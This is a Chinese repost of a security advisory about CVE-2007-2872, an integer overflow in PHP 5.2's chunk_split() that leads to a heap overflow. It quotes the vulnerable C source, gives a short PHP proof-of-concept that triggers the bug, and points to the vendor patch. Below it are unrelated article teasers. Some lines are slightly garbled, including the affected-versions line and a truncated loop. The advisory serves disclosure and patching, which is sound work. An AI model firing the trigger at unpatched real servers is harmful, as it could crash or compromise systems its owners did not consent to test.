PHP5.2下chunk_split()函数整数溢出漏洞分析

首頁

後端開發

php教程

PHP5.2下chunk_split()函数整数溢出漏洞分析_PHP教程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 21, 2016 pm 03:55 PM

phpsplit下函數分析影響整數溢出漏洞系統

受影响系统：
PHP PHP 不受影响系统：
PHP PHP 5.2.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872

PHP是一种流行的WEB服务器端编程语言。

PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。

PHP中chunk_split函数的1963行试图为函数结果分配充分的内存大小，但没有执行任何检查便使用了srclen和chunklen参数块。如果值的块和endlen大于65534字节的话，就会触发整数溢出，分配错误的内存大小，导致堆溢出。

ext/standard/string.c：

1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p 1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }

链接：http://marc.info/?l=bugtraq&m=118071054000708&w=2
http://www.php.net/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

建议：
--------------------------------------------------------------------------------
厂商补丁：

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.php.net/downloads.php#v5

文章来自: 绿盟科技

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

提高 Python 代码可读性的五个基本技巧Apr 12, 2023 pm 08:58 PM

Python 中有许多方法可以帮助我们理解代码的内部工作原理，良好的编程习惯，可以使我们的工作事半功倍！例如，我们最终可能会得到看起来很像下图中的代码。虽然不是最糟糕的，但是，我们需要扩展一些事情，例如：load_las_file 函数中的 f 和 d 代表什么？为什么我们要在 clay 函数中检查结果？这些函数需要什么类型？Floats? DataFrames?在本文中，我们将着重讨论如何通过文档、提示输入和正确的变量名称来提高应用程序/脚本的可读性的五个基本技巧。1. Comments我们可

CRPS：贝叶斯机器学习模型的评分函数Apr 12, 2023 am 11:07 AM

连续分级概率评分（Continuous Ranked Probability Score, CRPS）或“连续概率排位分数”是一个函数或统计量，可以将分布预测与真实值进行比较。机器学习工作流程的一个重要部分是模型评估。这个过程本身可以被认为是常识：将数据分成训练集和测试集，在训练集上训练模型，并使用评分函数评估其在测试集上的性能。评分函数（或度量）是将真实值及其预测映射到一个单一且可比较的值 [1]。例如，对于连续预测可以使用 RMSE、MAE、MAPE 或 R 平方等评分函数。如果预测不是逐点

Java String中的split方法如何使用May 02, 2023 am 09:37 AM

String中split方法使用String的split()方法用于按传入的字符或字符串对String进行拆分，返回拆分之后的数组。1、一般用法用一般的字符，例如@或,等符号做分隔符时：Stringaddress="上海@上海市@闵行区@吴中路";String[]splitAddr=address.split("@");System.out.println(splitAddr[0]+splitAddr[1]+splitAddr[2]+splitAddr[3

详解JavaScript函数如何实现可变参数？（总结分享）Aug 04, 2022 pm 02:35 PM

js是弱类型语言，不能像C#那样使用param关键字来声明形参是一个可变参数。那么js中，如何实现这种可变参数呢？下面本篇文章就来聊聊JavaScript函数可变参数的实现方法，希望对大家有所帮助！

如何解决 golang 中的 “undefined: bytes.Split” 错误？Jun 25, 2023 pm 02:02 PM

在Go语言中，bytes包是一个用于操作字节类型的包，并且它包含了许多有用的方法，比如Split()方法。不过，在使用Split()方法时，你可能会遇到“undefined:bytes.Split”的错误。这种错误通常是由于Go版本不兼容或缺少必要的依赖库等原因引起的。这篇文章将介绍一些解决这种错误的方法。方法一：升级Go版本如

学Python，还不知道main函数吗Apr 12, 2023 pm 02:58 PM

Python 中的 main 函数充当程序的执行点，在 Python 编程中定义 main 函数是启动程序执行的必要条件，不过它仅在程序直接运行时才执行，而在作为模块导入时不会执行。要了解有关 Python main 函数的更多信息，我们将从如下几点逐步学习：什么是 Python 函数Python 中 main 函数的功能是什么一个基本的 Python main() 是怎样的Python 执行模式Let’s get started什么是 Python 函数相信很多小伙伴对函数都不陌生了，函数是可

盘点Python内置函数sorted()高级用法实战May 13, 2023 am 10:34 AM

一、前言前几天在Python钻石交流群有个叫【emerson】的粉丝问了一个Python排序的问题，这里拿出来给大家分享下，一起学习下。其实这里【瑜亮老师】、【布达佩斯的永恒】等人讲了很多，只不过对于基础不太好的小伙伴们来说，还是有点难的。不过在实际应用中内置函数sorted()用的还是蛮多的，这里也单独拿出来讲一下，希望下次再有小伙伴遇到的时候，可以不慌。二、基础用法内置函数sorted()可以用来做排序，基础的用法很简单，看个例子，如下所示。lst=[3,28,18,29,2,5,88

split在python中的用法Nov 17, 2023 am 10:13 AM

在Python中，split() 是一个常用的字符串方法，用于将字符串分割成子字符串，并返回一个包含这些子字符串的列表。该方法可以根据指定的分隔符将字符串拆分成多个部分。其基本语法是“str.split(separator, maxsplit)”，str是要分割的字符串，separator是分隔符，maxsplit是可选参数，表示最大分割次数。

See all articles